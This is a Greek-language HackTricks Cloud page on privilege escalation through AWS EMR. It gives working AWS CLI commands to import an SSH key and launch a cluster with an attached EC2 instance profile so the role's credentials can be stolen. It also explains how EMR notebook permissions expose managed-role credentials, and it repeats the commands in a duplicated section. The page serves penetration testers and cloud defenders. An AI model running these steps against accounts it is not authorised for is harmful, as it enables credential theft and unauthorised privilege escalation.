AWS - EMR Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

EMR

Περισσότερες πληροφορίες σχετικά με το EMR στο:

AWS - EMR Enum

`iam:PassRole`, `elasticmapreduce:RunJobFlow`

Ένας επιτιθέμενος με αυτές τις άδειες μπορεί να τρέξει ένα νέο EMR cluster συνδέοντας ρόλους EC2 και να προσπαθήσει να κλέψει τα διαπιστευτήριά του. Σημειώστε ότι για να το κάνετε αυτό θα χρειαστεί να γνωρίζετε κάποιο ssh priv key που έχει εισαχθεί στον λογαριασμό ή να εισάγετε ένα, και να μπορείτε να ανοίξετε την πόρτα 22 στον κύριο κόμβο (μπορείτε να το κάνετε αυτό με τα χαρακτηριστικά EmrManagedMasterSecurityGroup και/ή ServiceAccessSecurityGroup μέσα στο --ec2-attributes).

# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key


aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc

# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances

Σημειώστε πώς ένας ρόλος EMR καθορίζεται στο --service-role και ένας ρόλος ec2 καθορίζεται στο --ec2-attributes μέσα στο InstanceProfile. Ωστόσο, αυτή η τεχνική επιτρέπει μόνο την κλοπή των διαπιστευτηρίων του ρόλου EC2 (καθώς θα συνδεθείτε μέσω ssh) αλλά όχι του ρόλου IAM EMR.

Πιθανές Επιπτώσεις: Privesc στον ρόλο υπηρεσίας EC2 που καθορίζεται.

`elasticmapreduce:CreateEditor`, `iam:ListRoles`, `elasticmapreduce:ListClusters`, `iam:PassRole`, `elasticmapreduce:DescribeEditor`, `elasticmapreduce:OpenEditorInConsole`

Με αυτές τις άδειες, ένας επιτιθέμενος μπορεί να πάει στην κονσόλα AWS, να δημιουργήσει ένα Notebook και να έχει πρόσβαση σε αυτό για να κλέψει τον ρόλο IAM.

Ακόμα και αν επισυνάψετε έναν ρόλο IAM στην περίπτωση του notebook στις δοκιμές μου, παρατήρησα ότι ήμουν σε θέση να κλέψω διαπιστευτήρια που διαχειρίζεται η AWS και όχι διαπιστευτήρια που σχετίζονται με τον ρόλο IAM.

Πιθανές Επιπτώσεις: Privesc στον ρόλο που διαχειρίζεται η AWS arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

`elasticmapreduce:OpenEditorInConsole`

Μόνο με αυτή την άδεια, ένας επιτιθέμενος θα είναι σε θέση να έχει πρόσβαση στο Jupyter Notebook και να κλέψει τον ρόλο IAM που σχετίζεται με αυτό. Η διεύθυνση URL του notebook είναι https://<notebook-id>.emrnotebooks-prod.eu-west-1.amazonaws.com/<notebook-id>/lab/

Πιθανές Επιπτώσεις: Privesc στον ρόλο που διαχειρίζεται η AWS arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.

PreviousAWS - Elastic Beanstalk Privesc NextAWS - EventBridge Scheduler Privesc

Last updated 3 days ago

EMR

Περισσότερες πληροφορίες σχετικά με το EMR στο:

AWS - EMR Enum

iam:PassRole, elasticmapreduce:RunJobFlow

# Import EC2 ssh key (you will need extra permissions for this)
ssh-keygen -b 2048 -t rsa -f /tmp/sshkey -q -N ""
chmod 400 /tmp/sshkey
base64 /tmp/sshkey.pub > /tmp/pub.key
aws ec2 import-key-pair \
--key-name "privesc" \
--public-key-material file:///tmp/pub.key


aws emr create-cluster \
--release-label emr-5.15.0 \
--instance-type m4.large \
--instance-count 1 \
--service-role EMR_DefaultRole \
--ec2-attributes InstanceProfile=EMR_EC2_DefaultRole,KeyName=privesc

# Wait 1min and connect via ssh to an EC2 instance of the cluster)
aws emr describe-cluster --cluster-id <id>
# In MasterPublicDnsName you can find the DNS to connect to the master instance
## You cna also get this info listing EC2 instances

Πιθανές Επιπτώσεις: Privesc στον ρόλο υπηρεσίας EC2 που καθορίζεται.

elasticmapreduce:CreateEditor, iam:ListRoles, elasticmapreduce:ListClusters, iam:PassRole, elasticmapreduce:DescribeEditor, elasticmapreduce:OpenEditorInConsole

Πιθανές Επιπτώσεις: Privesc στον ρόλο που διαχειρίζεται η AWS arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

elasticmapreduce:OpenEditorInConsole

Πιθανές Επιπτώσεις: Privesc στον ρόλο που διαχειρίζεται η AWS arn:aws:iam::420254708011:instance-profile/prod-EditorInstanceProfile

Μάθετε & εξασκηθείτε στο AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Μάθετε & εξασκηθείτε στο GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Υποστήριξη HackTricks

Ελέγξτε τα σχέδια συνδρομής!
Εγγραφείτε στην 💬 ομάδα Discord ή στην ομάδα telegram ή ακολουθήστε μας στο Twitter 🐦 @hacktricks_live.
Μοιραστείτε κόλπα hacking υποβάλλοντας PRs στα HackTricks και HackTricks Cloud github repos.